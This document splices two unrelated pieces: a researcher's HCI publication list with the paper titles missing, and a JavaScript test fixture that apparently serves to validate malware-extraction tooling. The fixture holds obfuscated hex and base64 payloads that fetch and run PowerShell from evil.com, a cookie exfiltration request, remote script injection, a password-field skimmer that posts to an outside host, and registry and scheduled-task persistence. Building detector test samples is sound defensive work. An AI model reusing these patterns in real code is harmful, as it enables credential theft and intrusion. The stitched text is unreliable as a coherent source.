Catherine Wieczorek

11 papers A* 4Journal 2Unranked 5
YearRankTypeTitle / Venue / Authors
2026 A* conf
CHI
Inha Cha, Catherine Wieczorek, Richmond Y. Wong
2026 J jnl
CoRR
Inha Cha, Catherine Wieczorek, Richmond Y. Wong
2026 conf
CHI Extended Abstracts
MinYoung Yoo, Sophia Ppali, Catherine Wieczorek, Hayoun Noh, Seung Hyeon Han, Anna R. L. Carter, Alexandra Teixeira Riggs, Nava Haghighi, Yvon Ruitenburg, William Odom
2026 A* conf
CHI
Catherine Wieczorek, Anh-Ton Tran, Cindy Kaiying Lin, Laura Forlano, Carl DiSalvo, Shaowen Bardzell
2025 A* conf
CHI
Catherine Wieczorek, Heidi Biggs, Kamala Payyapilly Thiruvenkatanathan, Shaowen Bardzell
2025 conf
CSCW Companion
Angela M. Schöpke-Gonzalez, Kellie Dunn, Shaowen Bardzell, Makayla Lewis, Maria Murray, Catherine Wieczorek
2025 conf
CSCW Companion
Adrian Petterson, Benedetta Lusi, Cristina Bosco, Ashique Ali Thuppilikkat, Anupriya Tuli, Catherine Wieczorek, Robert Soden, Emily Tseng, Priyank Chandra
2025 J jnl
Proc. ACM Hum. Comput. Interact.
Catherine Wieczorek, Cindy Kaiying Lin, Shaowen Bardzell
2025 A* conf
CHI
MinYoung Yoo, Sophia Ppali, William Odom, Yumeng Zhuang, Kritika Kritika, Wyatt Olson, Catherine Wieczorek, Heidi Biggs, Arne Berger, Audrey Desjardins, Ron Wakkary, Kathryn E. Ringland
2023 conf
CHI Extended Abstracts
Catherine Wieczorek, Heidi R. Biggs, Margaret C. Jack, Laura Forlano, Shaowen Bardzell
2022 conf
PDC (2)
Catherine Wieczorek, Heidi R. Biggs, Maggie Jack, Laura Forlano, Shaowen Bardzell, Jeffrey Bardzell
test_files/test_malicious.js
← Index test_files/test_malicious.js javascript
// Simulated malicious JavaScript sample for testing REDB JS extractors
// This file contains common malware patterns for analysis validation

var _0x4a2f = ["\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x70\x61\x79\x6c\x6f\x61\x64"];
var _0xb3 = ["\x57\x53\x63\x72\x69\x70\x74"];

// Obfuscated string reconstruction
var cmd = String.fromCharCode(112, 111, 119, 101, 114, 115, 104, 101, 108, 108);
var encoded_payload = "cG93ZXJzaGVsbCAtZXAgYnlwYXNzIC1jICJJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly9ldmlsLmNvbS9zdGFnZTInKSI=";

// WScript-based malware pattern
var shell = WScript.CreateObject("WScript.Shell");
var fso = WScript.CreateObject("Scripting.FileSystemObject");

// Eval-based code execution
eval(function(p, a, c, k, e, d) {
    while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + c.toString(a) + '\\b', 'g'), k[c]) } }
    return p
}('1 0="2://3.4/5";', 6, 6, 'url|var|http|malware|example|download'.split('|'), 0, {}));

// Network communication
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.1.100:8080/exfil", true);
xhr.send(document.cookie);

// File system operations
var stream = WScript.CreateObject("ADODB.Stream");
stream.Open();
stream.Type = 1;

// Registry manipulation
shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", "C:\\Users\\Public\\malware.exe");

// Dynamic script injection
var s = document.createElement("script");
s.src = "https://evil-cdn.tk/inject.js";
document.body.appendChild(s);

// DOM skimmer pattern
document.querySelector("input[type=password]").addEventListener("keyup", function(e) {
    fetch("https://skimmer.gq/collect", {
        method: "POST",
        body: JSON.stringify({val: e.target.value})
    });
});

// Crypto miner pattern
var worker = new Worker("data:application/javascript," + atob(encoded_payload));

// Additional obfuscation: concatenated strings
var c2_url = "ht" + "tp" + "://" + "bad" + "guy" + ".r" + "u/" + "gate";

// setTimeout with string execution
setTimeout("eval(atob('" + encoded_payload + "'))", 1000);

function downloadPayload(url) {
    var req = WScript.CreateObject("MSXML2.XMLHTTP");
    req.open("GET", url, false);
    req.send();
    return req.responseText;
}

function persist() {
    shell.Run("cmd.exe /c schtasks /create /tn UpdateCheck /tr C:\\payload.exe /sc daily", 0, false);
    shell.Exec("powershell -ep bypass -c IEX(payload)");
}

downloadPayload(_0x4a2f[0]);
persist();

// Packer-style single-line payload to give the obfuscation heuristic the
// strong-signal evidence it expects from real obfuscator.io output: hex-escape
// density >5% and a max_line >10K chars. The repeat() saturates both.
var _0xpayload="\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x73\x74\x61\x67\x65\x32\x2e\x6a\x73\x3f\x69\x64\x3d".repeat(800)+"\x22\x49\x45\x58\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x53\x74\x72\x69\x6e\x67\x28\x27\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x70\x61\x79\x6c\x6f\x61\x64\x27\x29\x22";